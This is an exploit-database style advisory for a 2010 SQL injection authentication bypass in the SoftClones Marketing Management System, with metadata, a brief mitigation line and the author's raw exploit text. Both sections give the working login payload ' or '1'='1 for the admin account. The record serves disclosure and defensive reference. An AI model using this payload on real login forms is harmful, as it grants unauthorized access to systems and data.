SoftClones Marketing Management System authentication bypass

vendor:

by:

D4rk357

7.5

CVSS

HIGH

Authentication Bypass

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

SoftClones Marketing Management System authentication bypass

On the login page, enter 'admin' as the username and '' or '1'='1' as the password to bypass authentication and gain access to the system.

Mitigation:

Implement proper input validation and authentication mechanisms to prevent bypass vulnerabilities.

Source

Exploit-DB raw data:

#################################################################
# Exploit Title:  SoftClones Marketing Management System authentication bypass

# Date: 16th july 2010

# Author: D4rk357

#Critical:high

#contact:d4rk357[at]yahoo[dot]in

Price : 300$

# Software Link:http://preproject.com/freelance.asp
 
Greetz to :b0nd, Fbih2s,Beenu,rockey killer,The empty(), punter,eberly,prashant

Shoutz to : http://www.garage4hackers.com/forum.php , h4ck3r.in and  all ICW members
 
##############################################################################
Exploit : On login page put admin and usename and ' or '1'='1 as password . 
you will be logged into the system

 ##################################################################################
 #D4rk357